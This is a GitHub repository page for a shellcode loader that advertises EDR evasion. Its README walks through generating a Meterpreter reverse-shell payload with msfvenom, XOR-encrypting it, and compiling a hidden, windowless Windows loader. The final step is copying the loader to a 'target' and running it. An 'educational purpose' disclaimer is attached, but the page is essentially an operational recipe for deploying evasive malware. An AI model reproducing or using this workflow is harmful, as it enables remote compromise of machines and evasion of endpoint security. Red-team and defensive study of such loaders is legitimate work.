Skip to content

achnouri/Shellcode-EDR-Evasion-Loader

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
ShellcodeLoader.cpp
ShellcodeLoader.cpp
 
 
ShellcodeLoader.hpp
ShellcodeLoader.hpp
 
 
ShellcodeLoaderEncrypter.py
ShellcodeLoaderEncrypter.py
 
 

Repository files navigation

Shellcode Loader

Python Encrypter + C++ Loader

Features

  • XOR encryption with 8-byte rotating key
  • External payload loading (data.bin)
  • Process detachment : Spawns independent background process (no console window)
  • Memory protection

Files:

ShellcodeLoaderEncrypter.py : XOR encryption script
ShellcodeLoader.cpp : Windows loader

Usage

1- Generate shellcode

test payload

msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin

reverse shell

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin

2- Encryption

python3 ShellLoaderEncrypter.py payload.bin

output:

data.bin : encrypted payload


3- Compile loader

x86_64-w64-mingw32-g++ ShellcodeLoader.cpp -o loader.exe -O2 -s -static -mwindows

4- Execute

copy loader.exe and data.bin to target, then run:

C:\> loader.exe



License

MIT License - Educational purpose only

Disclaimer :

Educational Purpose - Intended for

  • security research and education
  • authorized penetration testing engagements
  • Malware analysis and defense training
  • Understanding EDR evasion concepts

About

shellcode loader with XOR encryption and EDR evasion techniques. for security research and authorized testing only.

Topics

shellcode-loader windows-security edr-evasion

Resources

Readme

License

View license
Activity

Stars

4 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages